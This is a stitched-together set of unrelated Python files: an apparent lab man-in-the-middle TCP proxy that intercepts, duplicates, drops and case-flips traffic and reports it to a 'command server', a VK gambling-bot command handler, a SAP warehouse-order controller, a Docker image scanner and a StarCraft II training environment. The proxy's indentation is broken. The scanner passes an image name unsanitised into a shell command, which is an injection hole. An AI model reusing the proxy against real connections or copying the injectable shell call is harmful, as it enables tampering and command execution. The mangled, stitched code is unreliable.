mitm.py
|
#!/usr/bin/env python2
from __future__ import print_function
import traceback
import random
import socket
import argparse
import threading
import signal
import json
import requests
import sys
import time
from Queue import Queue
from contextlib import contextmanager
running = True
verbose = True
c2s = 0
s2c = 0
CLIENT2SERVER = 1
SERVER2CLIENT = 2
def log(m):
    print(m, file=sys.stderr)
def mitm(buff, direction, shared):
"""
YOUR ATTACK GOES HERE
"""
shared.put({"type":"done"})
hb = "".join("{:02x}".format(ord(c)) for c in buff)
# hb = buff
if direction == CLIENT2SERVER:
log( "-> %s ->" % hb)
global c2s
c2s = c2s + 1
log("c2s %s" % str(c2s))
elif direction == SERVER2CLIENT:
log( "<- %s <-" % hb)
global s2c
s2c = s2c + 1
log("s2c %s" % str(s2c))
    if direction == CLIENT2SERVER and c2s == 5:
        # str has no .append(); the old code set buff to None here.
        buff = buff + buff  # duplicate the 5th client->server message
    elif direction == SERVER2CLIENT and s2c == 3:
        buff = ""  # drop the 3rd server->client message
return buff
#return "".join([ i if random.choice([True,False]) == True else '' for i in buff ])
#return "".join([ chr(ord(i) ^ 0x20) if ord(i) >= 0x41 and ord(i) <= 0x71 else i for i in buff])
@contextmanager
def ignored(*exceptions):
try:
yield
except exceptions:
pass
def killp(a, b):
with ignored(Exception):
a.shutdown(socket.SHUT_RDWR)
a.close()
b.shutdown(socket.SHUT_RDWR)
b.close()
return
def worker(client, server, n, shared):
    while running:
b = ""
with ignored(Exception):
b = client.recv(4096)
if len(b) == 0:
killp(client,server)
return
try:
b = mitm(b,n, shared)
except:
pass
try:
server.send(b)
except:
killp(client,server)
return
killp(client,server)
return
def signalhandler(sn, sf):
global running
running = False
def doProxyMain(port, remotehost, remoteport):
    signal.signal(signal.SIGTERM, signalhandler)
    workers = []  # defined before the try so the cleanup loop cannot hit a NameError
    try:
        shared = Queue()
        # sendInput reads the command-server address from the global args
        p = threading.Thread(target=sendInput, args=(args.c, args.d, shared))
        p.start()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind(("0.0.0.0", port))
        s.listen(1)
print("started")
sys.stdout.flush()
        while running:
k,a = s.accept()
v = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
v.connect((remotehost, remoteport))
t1 = threading.Thread(target=worker, args=(k,v,CLIENT2SERVER, shared))
t2 = threading.Thread(target=worker, args=(v,k,SERVER2CLIENT, shared))
t2.start()
t1.start()
workers.append((t1,t2,k,v))
except Exception:
signalhandler(None, None)
# log("********exiting1*******")
for t1,t2,k,v in workers:
killp(k,v)
t1.join()
t2.join()
# log("********exiting2*******")
p.join()
# log("********exiting3*******")
return
def sendInput(host, port, shared):
global running
while running:
# log("********GETTING******* %s" % str(running))
try:
d = shared.get( block=True, timeout = 1)
time.sleep(1)
#log("got: %s" % str(d))
r = requests.post( "http://"+host+":"+str(port), data = {'REQUEST':json.dumps(d)})
log( r.text)
except:
time.sleep(1)
# log("********next*******")
pass
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Proxy')
parser.add_argument('-p', type=int, default=4000, help="listen port")
parser.add_argument('-s', type=str, default="127.0.0.1", help="server ip address")
parser.add_argument('-q', type=int, default=3000, help="server port")
parser.add_argument('-c', type=str, default="127.0.0.1", help="command server")
parser.add_argument('-d', type=int, default=5000, help="command port")
args = parser.parse_args()
doProxyMain(args.p, args.s, args.q)
|
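A minimal sketch of an actual tamper rule that could replace the demo logic in mitm() above. This is hypothetical (the useful mutation depends on the target protocol): it reports every intercepted buffer to the command server, then flips the ASCII case of letters in server-to-client traffic.

# Hypothetical drop-in body for mitm(): report, then tamper with s->c data.
def mitm_case_flip(buff, direction, shared):
    shared.put({"type": "intercepted",
                "direction": direction,
                "hex": "".join("{:02x}".format(ord(c)) for c in buff)})
    if direction == SERVER2CLIENT:
        # Flip the case bit of ASCII letters; leave other bytes untouched.
        return "".join(chr(ord(c) ^ 0x20) if c.isalpha() else c for c in buff)
    return buff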
CommandsHandler.py
|
# Other
from threading import Thread
# Commands Interfaces
from source.commands.interfaces.BalanceInterface import BalanceInterface
from source.commands.interfaces.DoubleHelpInterface import DoubleHelpInterface
from source.commands.interfaces.GlobalTopInterface import GlobalTopInterface
from source.commands.interfaces.HelpInterface import HelpInterface
from source.commands.interfaces.NoGameInterface import NoGameInterface
from source.commands.interfaces.ResetInterface import ResetInterface
from source.commands.interfaces.RussianRouletteHelpInterface import RussianRouletteHelpInterface
from source.games.interface.DoubleInterface import DoubleInterface
from source.games.interface.RussianRouletteInterface import RussianRouletteInterface
from source.static.GameInterface import GameInterface
from source.vkapi.BotAPI import BotAPI
from source.commands.interfaces.DoCInterface import DoCInterface
class CommandsHandler:
def __init__(self, user_id, peer_id):
self.user_id = user_id
self.peer_id = peer_id
self.args = None
self.vk = BotAPI()
def identify_comma(self, comma):
if comma.startswith('/double'):
new_game = Thread(target=DoubleInterface.start, args=(self.peer_id,))
new_game.start()
elif comma.startswith('/balance'):
BalanceInterface.get(self.user_id, self.peer_id)
elif '/bet' in comma:
game = GameInterface.get_game(self.peer_id)
if not game:
NoGameInterface.init(self.peer_id, self.user_id)
elif game['game'] != 'double':
NoGameInterface.init(self.peer_id, self.user_id)
else:
game['interface'].bet(self.peer_id, self.user_id, comma)
elif '/DoC' in comma and self.user_id == 239125937:
DoCInterface.init(self.peer_id, comma)
elif comma.startswith('/help'):
HelpInterface.init(self.peer_id, self.user_id)
elif comma.startswith('/reset'):
ResetInterface.init(self.user_id, self.peer_id)
elif comma.startswith('/doubleh'):
DoubleHelpInterface.init(self.peer_id, self.user_id)
elif comma.startswith('/rrh'):
RussianRouletteHelpInterface.init(self.peer_id, self.user_id)
elif comma.startswith('/top'):
GlobalTopInterface.init(self.peer_id, self.user_id)
elif comma.startswith('/rr'):
new_game = Thread(target=RussianRouletteInterface.start, args=(self.peer_id,))
new_game.start()
elif comma.startswith('/rp'):
game = GameInterface.get_game(self.peer_id)
if not game:
NoGameInterface.init(self.peer_id, self.user_id)
else:
game['interface'].add_member(self.peer_id, self.user_id)
else:
return
|
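A hypothetical driver for the handler above, assuming the VK long-poll loop delivers message text plus user/peer ids (the ids here are placeholders):

# Hypothetical dispatch: one handler per incoming message.
incoming = [
    (12345, 2000000001, '/balance'),
    (12345, 2000000001, '/double'),
    (12345, 2000000001, '/bet 100 red'),
]
for user_id, peer_id, text in incoming:
    CommandsHandler(user_id, peer_id).identify_comma(text)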
ordercontroller.py
|
#!/usr/bin/env python3
# encoding: utf-8
#
# Copyright (c) 2019 SAP SE or an SAP affiliate company. All rights reserved.
#
# This file is part of ewm-cloud-robotics
# (see https://github.com/SAP/ewm-cloud-robotics).
#
# This file is licensed under the Apache Software License, v. 2 except as noted
# otherwise in the LICENSE file (https://github.com/SAP/ewm-cloud-robotics/blob/master/LICENSE)
#
"""K8s custom resource handler for EWM warehouse orders."""
import logging
import threading
import time
from collections import OrderedDict
from typing import Dict, List, OrderedDict as TOrderedDict, Tuple
from cattr import structure
from robcoewmtypes.helper import get_sample_cr
from robcoewmtypes.warehouseorder import WarehouseOrderCRDSpec, WarehouseOrderCRDStatus
from k8scrhandler.k8scrhandler import K8sCRHandler
from .helper import RobotIdentifier
_LOGGER = logging.getLogger(__name__)
class OrderController(K8sCRHandler):
"""Handle K8s custom resources."""
def __init__(self, namespace: str) -> None:
"""Construct."""
# Processed warehouse order CRs dictionary
self._processed_orders: TOrderedDict[str, str] = OrderedDict()
self._processed_orders_lock = threading.RLock()
self._deleted_orders: TOrderedDict[str, bool] = OrderedDict()
template_cr = get_sample_cr('warehouseorder')
super().__init__(
'ewm.sap.com',
'v1alpha1',
'warehouseorders',
namespace,
template_cr,
{}
)
# Thread to check for deleted warehouse order CRs
self.deleted_warehouse_orders_thread = threading.Thread(
target=self._deleted_orders_checker)
# Register callbacks
self.register_callback(
'CleanupOrders', ['ADDED', 'MODIFIED', 'REPROCESS'], self._cleanup_orders_cb)
self.register_callback('DeletedOrders', ['DELETED'], self._order_deleted_cb)
def _cleanup_orders_cb(self, name: str, custom_res: Dict) -> None:
"""Cleanup processed warehouse order CRs."""
# No spec means nothing to update yet
if not custom_res.get('spec'):
return
# Clean up warehouse orders with order_status PROCESSED
if custom_res['spec'].get('order_status') == WarehouseOrderCRDSpec.STATE_PROCESSED:
# If CR already deleted, there is no need for a cleanup
if name in self._deleted_orders:
return
# Already in order_status PROCESSED no need for cleanup
if self._processed_orders.get(name) == WarehouseOrderCRDSpec.STATE_PROCESSED:
return
elif custom_res['spec'].get('order_status') == WarehouseOrderCRDSpec.STATE_RUNNING:
if self._processed_orders.get(name):
with self._processed_orders_lock:
self._processed_orders.pop(name, None)
if name in self._deleted_orders:
self._deleted_orders.pop(name, None)
# order_status RUNNING, no reason for cleanup
return
else:
_LOGGER.warning('Unknown order_status "%s"', custom_res['spec'].get('order_status'))
return
# OrderedDict must not be changed when iterating (self._processed_orders)
with self._processed_orders_lock:
# New in order_status PROCESSED
self._processed_orders[name] = WarehouseOrderCRDSpec.STATE_PROCESSED
# Delete warehouse orders with status PROCESSED
# Keep maximum of 50 warehouse_orders
processed = 0
delete_warehouse_orders = []
# Start counting from the back of warehouse order OrderedDict
for warehouse_order in reversed(self._processed_orders.keys()):
processed += 1
if processed > 50:
# Save warehouse_order to be deleted
delete_warehouse_orders.append(warehouse_order)
# Delete warehouse order CR
for warehouse_order in delete_warehouse_orders:
if self.check_cr_exists(warehouse_order):
self.delete_cr(warehouse_order)
self._deleted_orders[warehouse_order] = True
self._processed_orders.pop(warehouse_order, None)
_LOGGER.info('RobCo warehouse_order CR %s was cleaned up', warehouse_order)
else:
self._deleted_orders[warehouse_order] = True
self._processed_orders.pop(warehouse_order, None)
# Keep a maximum of 500 entries in deleted orders OrderedDict
to_remove = max(0, len(self._deleted_orders) - 500)
for _ in range(to_remove):
self._deleted_orders.popitem(last=False)
    def _deleted_orders_checker(self) -> None:
        """Continuously check for deleted warehouse_order CRs and remove them from the ordered dict."""
        _LOGGER.info(
            'Start continuously checking for deleted warehouse_order CRs')
while self.thread_run:
try:
self._check_deleted_orders()
except Exception as err: # pylint: disable=broad-except
_LOGGER.error(
'Error checking for deleted warehouse_orders: %s', err, exc_info=True)
# On uncovered exception in thread save the exception
self.thread_exceptions['deleted_warehouse_orders_checker'] = err
# Stop the watcher
self.stop_watcher()
finally:
# Wait 10 seconds
if self.thread_run:
time.sleep(10)
def _check_deleted_orders(self) -> None:
"""Remove self._processed_orders entries with no CR from ordered dictionary."""
cr_resp = self.list_all_cr()
_LOGGER.debug('%s/%s: Check deleted CR: Got all CRs.', self.group, self.plural)
# Collect names of all existing CRs
warehouse_order_crs = {}
for obj in cr_resp:
spec = obj.get('spec')
if not spec:
continue
metadata = obj.get('metadata')
warehouse_order_crs[metadata['name']] = True
# Compare with self._processed_orders
deleted_warehouse_orders = []
with self._processed_orders_lock:
for warehouse_order in self._processed_orders.keys():
if warehouse_order not in warehouse_order_crs:
deleted_warehouse_orders.append(warehouse_order)
for warehouse_order in deleted_warehouse_orders:
self._deleted_orders[warehouse_order] = True
self._processed_orders.pop(warehouse_order, None)
def run(self, reprocess: bool = False, multiple_executor_threads: bool = False) -> None:
"""Start running all callbacks."""
# If reprocessing is enabled, check for deleted warehouse order CRs too
if reprocess:
self.deleted_warehouse_orders_thread.start()
# start own callbacks
super().run(reprocess=reprocess, multiple_executor_threads=multiple_executor_threads)
def send_who_to_robot(self, robotident: RobotIdentifier, who: Dict) -> None:
"""Send the warehouse order to a robot."""
labels = {}
# Robot name and warehouse order CR names must be lower case
labels['cloudrobotics.com/robot-name'] = robotident.rsrc.lower()
name = '{lgnum}.{who}'.format(lgnum=who['lgnum'], who=who['who']).lower()
        # Warehouse orders are processed by the robot in the sequence they are assigned
spec = {
'data': who,
'order_status': WarehouseOrderCRDSpec.STATE_RUNNING,
'sequence': time.time_ns()}
if self.check_cr_exists(name):
_LOGGER.debug('Warehouse order CR "%s" exists. Update it', name)
cr_old = self.get_cr(name)
robot_old = cr_old['metadata'].get('labels', {}).get('cloudrobotics.com/robot-name')
order_status_old = cr_old['spec'].get('order_status')
            # Keep the sequence if neither the order_status nor the robot-name label changed
if robot_old == robotident.rsrc.lower() and order_status_old == spec['order_status']:
spec['sequence'] = cr_old['spec'].get('sequence', 0)
# Update CR
self.update_cr_spec(name, spec, labels)
else:
_LOGGER.debug('Warehouse order CR "%s" not existing. Create it', name)
spec['sequence'] = time.time_ns()
self.create_cr(name, labels, spec)
def cleanup_who(self, who: Dict) -> None:
"""Cleanup warehouse order when it was finished."""
# Warehouse orders to be deleted
to_be_closed = []
# Delete warehouse order
# Warehouse order CR name must be lower case
name = '{lgnum}.{who}'.format(lgnum=who['lgnum'], who=who['who']).lower()
to_be_closed.append(name)
spec_order_processed = {'data': who, 'order_status': WarehouseOrderCRDSpec.STATE_PROCESSED}
if self.check_cr_exists(name):
self.update_cr_spec(name, spec_order_processed)
            _LOGGER.info(
                'Cleanup successful, warehouse order CR "%s" in order_status %s', name,
                WarehouseOrderCRDSpec.STATE_PROCESSED)
else:
_LOGGER.warning('Warehouse order CR "%s" does not exist, unable to clean up', name)
# Delete sub warehouse orders if existing
crs = self.list_all_cr()
for obj in crs:
spec = obj.get('spec')
if not spec:
continue
# Delete warehouse order if its top warehouse order
# was deleted in this step
if (spec['data']['topwhoid'] == who['who']
and spec['data']['lgnum'] == who['lgnum']):
# Warehouse order CR name must be lower case
name = '{lgnum}.{who}'.format(
lgnum=spec['data']['lgnum'], who=spec['data']['who']).lower()
to_be_closed.append(name)
if self.check_cr_exists(name):
self.update_cr_spec(name, spec_order_processed)
                    _LOGGER.info(
                        'Cleanup successful, warehouse order CR "%s" in order_status %s',
                        name, WarehouseOrderCRDSpec.STATE_PROCESSED)
else:
_LOGGER.warning(
'Warehouse order CR "%s" does not exist, unable to clean up', name)
def _order_deleted_cb(self, name: str, custom_res: Dict) -> None:
"""Remove deleted CR from self._processed_orders."""
self._deleted_orders[name] = True
if self._processed_orders.get(name):
with self._processed_orders_lock:
# When warehouse order CR was deleted remove it from ordered dictionary
self._processed_orders.pop(name, None)
def save_processed_status(self, name: str, custom_res: Dict) -> None:
"""Save processed custom resource status in spec.process_status."""
# No status means nothing to update yet
if not custom_res.get('status'):
return
if self.check_cr_exists(name):
# Only if changed
if custom_res['spec'].get('process_status') != custom_res[
'status'].get('data'):
data_processed = {'process_status': custom_res['status']['data']}
self.update_cr_spec(name, data_processed)
def check_for_running_whos(self, robot: str) -> bool:
"""Check if there are RUNNING warehouse orders for the robot."""
crs = self.list_all_cr()
for c_res in crs:
if (c_res['metadata'].get('labels', {}).get('cloudrobotics.com/robot-name') == robot
and c_res['spec'].get('order_status') == WarehouseOrderCRDSpec.STATE_RUNNING):
return True
return False
def get_running_whos(
self, robot: str) -> List[Tuple[WarehouseOrderCRDSpec, WarehouseOrderCRDStatus]]:
"""Get running warehouse orders of a robot."""
whos = []
crs = self.list_all_cr()
for c_res in crs:
if (c_res['metadata'].get('labels', {}).get('cloudrobotics.com/robot-name') == robot
and c_res['spec'].get('order_status') == WarehouseOrderCRDSpec.STATE_RUNNING):
who_spec = structure(c_res['spec'], WarehouseOrderCRDSpec)
if c_res.get('status', {}).get('data') is not None:
who_status = structure(c_res['status'], WarehouseOrderCRDStatus)
else:
who_status = WarehouseOrderCRDStatus()
whos.append((who_spec, who_status))
return whos
|
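A rough sketch of how this controller might be wired up. Assumptions: a default namespace, and that RobotIdentifier can be built from a robot resource name (inferred from the .rsrc usage above); the field values are placeholders.

controller = OrderController(namespace='default')
controller.run(reprocess=True)  # also starts the deleted-orders checker thread

# Assign a warehouse order to a robot.
who = {'lgnum': '1710', 'who': '2000001', 'topwhoid': '0000000000'}
robot = RobotIdentifier(rsrc='MIR-01')  # assumed constructor
controller.send_who_to_robot(robot, who)

# Later, once the robot reports completion:
controller.cleanup_who(who)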
analyzer.py
|
#
# Licensed to Dagda under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Dagda licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import requests
import json
import traceback
import subprocess
from subprocess import check_output
from threading import Thread
from analysis.static.os import os_info_extractor
from analysis.static.dependencies import dep_info_extractor
from analysis.static.av import malware_extractor
from api.internal.internal_server import InternalServer
from log.dagda_logger import DagdaLogger
from analysis.static.util.utils import extract_filesystem_bundle
from analysis.static.util.utils import clean_up
# Analyzer class
class Analyzer:
# -- Public methods
# Analyzer Constructor
def __init__(self, dagda_server_url=None):
super(Analyzer, self).__init__()
self.is_remote = False
if dagda_server_url is not None:
self.dagda_server_url = dagda_server_url
self.is_remote = True
else:
self.mongoDbDriver = InternalServer.get_mongodb_driver()
self.dockerDriver = InternalServer.get_docker_driver()
# Evaluate image from image name or container id
def evaluate_image(self, image_name, container_id):
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('ENTRY to the method for analyzing a docker image')
# Init
data = {}
# -- Static analysis
image_name = self.dockerDriver.get_docker_image_name_by_container_id(container_id) if container_id \
else image_name
        # Call the Klar tool to get the vulnerability result
os_packages = []
malware_binaries = []
dependencies = []
temp_dir = None
vulnerabilities = []
try:
# Get OS packages
# if InternalServer.is_debug_logging_enabled():
# DagdaLogger.get_logger().debug('Retrieving OS packages from the docker image ...')
#
# if container_id is None: # Scans the docker image
# os_packages = os_info_extractor.get_soft_from_docker_image(docker_driver=self.dockerDriver,
# image_name=image_name)
# temp_dir = extract_filesystem_bundle(docker_driver=self.dockerDriver,
# image_name=image_name)
# else: # Scans the docker container
# os_packages = os_info_extractor.get_soft_from_docker_container_id(docker_driver=self.dockerDriver,
# container_id=container_id)
# temp_dir = extract_filesystem_bundle(docker_driver=self.dockerDriver,
# container_id=container_id)
#
# if InternalServer.is_debug_logging_enabled():
# DagdaLogger.get_logger().debug('OS packages from the docker image retrieved')
# Get malware binaries in a parallel way
temp_dir = extract_filesystem_bundle(docker_driver=self.dockerDriver,
image_name=image_name)
malware_thread = Thread(target=Analyzer._threaded_malware, args=(self.dockerDriver, temp_dir,
malware_binaries))
malware_thread.start()
vuln_thread = Thread(target=Analyzer._threaded_klar, args=( image_name, vulnerabilities))
vuln_thread.start()
# Get programming language dependencies in a parallel way
#dependencies_thread = Thread(target=Analyzer._threaded_dependencies, args=(self.dockerDriver, image_name,
# temp_dir, dependencies))
#dependencies_thread.start()
# Waiting for the threads
malware_thread.join()
vuln_thread.join()
#dependencies_thread.join()
except Exception as ex:
message = "Unexpected exception of type {0} occurred: {1!r}"\
.format(type(ex).__name__, ex.get_message() if type(ex).__name__ == 'DagdaError' else ex.args)
DagdaLogger.get_logger().error(message)
if InternalServer.is_debug_logging_enabled():
traceback.print_exc()
data['status'] = message
# -- Cleanup
if temp_dir is not None:
clean_up(temporary_dir=temp_dir)
# -- Prepare output
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Preparing analysis output ...')
if 'status' not in data or data['status'] is None:
data['status'] = 'Completed'
data['image_name'] = image_name
data['timestamp'] = datetime.datetime.now().timestamp()
#data['static_analysis'] = self.generate_static_analysis(image_name, os_packages, dependencies, malware_binaries)
data['static_analysis'] = self.generate_static_analysis(image_name, malware_binaries, vulnerabilities )
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Analysis output completed')
# -- Return
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('EXIT from the method for analyzing a docker image')
return data
    # Generates the result of the static analysis (the os_packages and dependencies reports are currently disabled)
def generate_static_analysis(self, image_name, malware_binaries, klar_output):
data = {}
#data['os_packages'] = self.generate_os_report(image_name, os_packages)
#data['prog_lang_dependencies'] = self.generate_dependencies_report(image_name, dependencies)
data['malware_binaries'] = malware_binaries
        if len(klar_output) > 0:
            vulns = klar_output[0]["Vulnerabilities"]
            if vulns:
                vulns['criticalCount'] = 0
                vulns['isCritical'] = False
                vulns['defcon1Count'] = 0
                vulns['highCount'] = 0
                vulns['mediumCount'] = 0
                vulns['lowCount'] = 0
                if 'Critical' in vulns:
                    vulns['criticalCount'] = len(vulns['Critical'])
                    vulns['isCritical'] = True
                if 'Defcon1' in vulns:
                    vulns['defcon1Count'] = len(vulns['Defcon1'])
                    vulns['isCritical'] = True
                if 'High' in vulns:
                    vulns['highCount'] = len(vulns['High'])
                if 'Medium' in vulns:
                    vulns['mediumCount'] = len(vulns['Medium'])
                if 'Low' in vulns:
                    vulns['lowCount'] = len(vulns['Low'])
                vulns['LayerCount'] = klar_output[0]["LayerCount"]
                data['vulnerabilities'] = vulns
return data
# Generates dependencies report
def generate_dependencies_report(self, image_name, dependencies):
data = {}
dep_details = {}
dep_details['java'] = []
dep_details['python'] = []
dep_details['nodejs'] = []
dep_details['js'] = []
dep_details['ruby'] = []
dep_details['php'] = []
fp_count = 0
for dependency in dependencies:
d = {}
splitted_dep = dependency.split("#")
d['product'] = splitted_dep[1]
d['version'] = splitted_dep[2]
d['product_file_path'] = splitted_dep[3]
d['vulnerabilities'] = self.get_vulnerabilities(d['product'], d['version'])
d['is_vulnerable'] = True
d['is_false_positive'] = self.is_fp(image_name, d['product'], d['version'])
if d['is_false_positive']:
fp_count += 1
dep_details[splitted_dep[0]].append(d)
# Prepare output
data['vuln_dependencies'] = len(dep_details['java']) + len(dep_details['python']) + \
len(dep_details['nodejs']) + len(dep_details['js']) + \
len(dep_details['ruby']) + len(dep_details['php']) - fp_count
data['dependencies_details'] = dep_details
# Return
return data
# Generates os report
def generate_os_report(self, image_name, os_packages):
data = {}
products_status = []
vuln_products = 0
fp_count = 0
for package in os_packages:
p = {}
p['product'] = package['product']
p['version'] = package['version']
p['vulnerabilities'] = self.get_vulnerabilities(package['product'], package['version'])
if len(p['vulnerabilities']) > 0:
p['is_vulnerable'] = True
vuln_products += 1
else:
p['is_vulnerable'] = False
p['is_false_positive'] = self.is_fp(image_name, package['product'], package['version'])
if p['is_false_positive']:
fp_count += 1
products_status.append(p)
# Prepare output
vuln_products -= fp_count
data['total_os_packages'] = len(products_status)
data['vuln_os_packages'] = vuln_products
data['ok_os_packages'] = data['total_os_packages'] - vuln_products
data['os_packages_details'] = products_status
# Return
return data
# Gets vulnerabilities by product and version
def get_vulnerabilities(self, product, version):
if not self.is_remote:
return self.mongoDbDriver.get_vulnerabilities(product, version)
else:
if product is not None:
product += '/' + version
r = requests.get(self.dagda_server_url + '/vuln/products/' + product)
if r.status_code == 200:
return json.loads(r.content.decode('utf-8'))
return []
# Check if it is a false positive
def is_fp(self, image_name, product, version):
if not self.is_remote:
return self.mongoDbDriver.is_fp(image_name, product, version)
else:
if product is not None:
product += '/' + version
r = requests.get(self.dagda_server_url + '/history/' + image_name + '/fp/' + product)
return r.status_code == 204
# Get malware binaries thread
@staticmethod
def _threaded_malware(dockerDriver, temp_dir, malware_binaries):
# Get malware binaries
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Retrieving malware files from the docker image ...')
malware_binaries.extend(malware_extractor.get_malware_included_in_docker_image(docker_driver=dockerDriver,
temp_dir=temp_dir))
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Malware files from the docker image retrieved')
    # Get vulnerabilities from Clair using the Klar tool
    @staticmethod
    def _threaded_klar(image_name, vulnerabilities):
        if InternalServer.is_debug_logging_enabled():
            DagdaLogger.get_logger().debug('Retrieving vulnerabilities report from klar ...')
        result = subprocess.run('/klar ' + image_name, executable='/bin/ash', shell=True,
                                stdout=subprocess.PIPE)
        output = result.stdout.decode('utf-8')
        vulnerabilities.append(json.loads(output))
        if InternalServer.is_debug_logging_enabled():
            DagdaLogger.get_logger().debug('Vulnerabilities report from klar retrieved')
            DagdaLogger.get_logger().debug('Vulnerabilities generated: ' + output)
# Get programming language dependencies thread
@staticmethod
def _threaded_dependencies(dockerDriver, image_name, temp_dir, dependencies):
# Get programming language dependencies
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Retrieving dependencies from the docker image ...')
dependencies.extend(dep_info_extractor.get_dependencies_from_docker_image(docker_driver=dockerDriver,
image_name=image_name,
temp_dir=temp_dir))
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Dependencies from the docker image retrieved')
|
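A hypothetical invocation, assuming the code runs inside a Dagda deployment where InternalServer can hand out the MongoDB and Docker drivers and the /klar binary is present:

analyzer = Analyzer()  # local mode; remote mode would pass dagda_server_url
report = analyzer.evaluate_image('alpine:3.9', container_id=None)
print(report['status'])
print(report['static_analysis'].get('vulnerabilities', {}))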
subproc_vec_env.py
|
import numpy as np
from multiprocessing import Process, Pipe
from . import VecEnv
from pysc2.env import environment
from pysc2.env import sc2_env
from pysc2.lib import features, actions
_PLAYER_RELATIVE = features.SCREEN_FEATURES.player_relative.index
_SELECTED = features.SCREEN_FEATURES.selected.index
from common import common
def worker(remote, map_name, nscripts, i):
with sc2_env.SC2Env(
map_name=map_name,
step_mul=2,
screen_size_px=(32, 32),
minimap_size_px=(32, 32)) as env:
available_actions = []
result = None
group_list = []
xy_per_marine = {}
while True:
cmd, data = remote.recv()
if cmd == 'step':
reward = 0
if len(group_list) == 0 or common.check_group_list(env, result):
print("init group list")
result, xy_per_marine = common.init(env, result)
group_list = common.update_group_list(result)
action1 = data[0][0]
action2 = data[0][1]
# func = actions.FUNCTIONS[action1[0]]
# print("agent(",i," ) action : ", action1, " func : ", func)
func = actions.FUNCTIONS[action2[0]]
# print("agent(",i," ) action : ", action2, " func : ", func)
result = env.step(actions=[action1])
reward += result[0].reward
done = result[0].step_type == environment.StepType.LAST
move = True
if len(action2[1]) == 2:
x, y = action2[1][1]
# print("x, y:", x, y)
# if x == 0 and y == 0:
# move = False
                # 331 is the id of pysc2's Move_screen action function
                if (331 in available_actions and move and not done):
try:
result = env.step(actions=[action2])
reward += result[0].reward
done = result[0].step_type == environment.StepType.LAST
except Exception as e:
print("e :", e)
ob = (result[0].observation["screen"][
_PLAYER_RELATIVE:_PLAYER_RELATIVE + 1] == 3).astype(int)
# (1, 32, 32)
selected = result[0].observation["screen"][
_SELECTED:_SELECTED + 1] # (1, 32, 32)
# extra = np.zeros((1, 32, 32))
control_groups = result[0].observation["control_groups"]
army_count = env._obs[0].observation.player_common.army_count
available_actions = result[0].observation["available_actions"]
info = result[0].observation["available_actions"]
if done:
result = env.reset()
if len(group_list) == 0 or common.check_group_list(env, result):
# print("init group list")
result, xy_per_marine = common.init(env, result)
group_list = common.update_group_list(result)
info = result[0].observation["available_actions"]
if len(action1[1]) == 2:
group_id = action1[1][1][0]
player_y, player_x = (result[0].observation["screen"][
_SELECTED] == 1).nonzero()
if len(player_x) > 0:
if (group_id == 1):
xy_per_marine["1"] = [int(player_x.mean()), int(player_y.mean())]
else:
xy_per_marine["0"] = [int(player_x.mean()), int(player_y.mean())]
remote.send((ob, reward, done, info, army_count,
control_groups, selected, xy_per_marine))
elif cmd == 'reset':
result = env.reset()
reward = 0
if len(group_list) == 0 or common.check_group_list(env, result):
# print("init group list")
result, xy_per_marine = common.init(env, result)
group_list = common.update_group_list(result)
reward += result[0].reward
ob = (result[0].observation["screen"][
_PLAYER_RELATIVE:_PLAYER_RELATIVE + 1] == 3).astype(int)
selected = result[0].observation["screen"][
_SELECTED:_SELECTED + 1] # (1, 32, 32)
# extra = np.zeros((1, 32, 32))
control_groups = result[0].observation["control_groups"]
army_count = env._obs[0].observation.player_common.army_count
done = result[0].step_type == environment.StepType.LAST
info = result[0].observation["available_actions"]
available_actions = result[0].observation["available_actions"]
remote.send((ob, reward, done, info, army_count,
control_groups, selected, xy_per_marine))
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.action_spec().functions[data], ""))
elif cmd == "action_spec":
remote.send((env.action_spec().functions[data]))
else:
raise NotImplementedError
class SubprocVecEnv(VecEnv):
    def __init__(self, nenvs, nscripts, map_name):
        """
        nenvs: number of SC2 environments to run in subprocesses
        """
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
        self.ps = []
        for i, work_remote in enumerate(self.work_remotes):
            self.ps.append(
                Process(target=worker, args=(work_remote, map_name, nscripts, i)))
#
# self.ps = [Process(target=worker, args=(work_remote, (map_name)))
# for (work_remote,) in zip(self.work_remotes,)]
for p in self.ps:
p.start()
self.remotes[0].send(('get_spaces', 1))
self.action_space, self.observation_space = self.remotes[0].recv()
#print("action_space: ", self.action_space, " observation_space: ", self.observation_space)
def step(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', [action]))
results = [remote.recv() for remote in self.remotes]
obs, rews, dones, infos, army_counts, control_groups, selected, xy_per_marine = zip(
*results)
return np.stack(obs), np.stack(rews), np.stack(
dones), infos, army_counts, control_groups, np.stack(
selected), xy_per_marine
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
results = [remote.recv() for remote in self.remotes]
obs, rews, dones, infos, army_counts, control_groups, selected, xy_per_marine = zip(
*results)
return np.stack(obs), np.stack(rews), np.stack(
dones), infos, army_counts, control_groups, np.stack(
selected), xy_per_marine
def action_spec(self, base_actions):
for remote, base_action in zip(self.remotes, base_actions):
remote.send(('action_spec', base_action))
results = [remote.recv() for remote in self.remotes]
return results
def close(self):
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
@property
def num_envs(self):
return len(self.remotes)
|
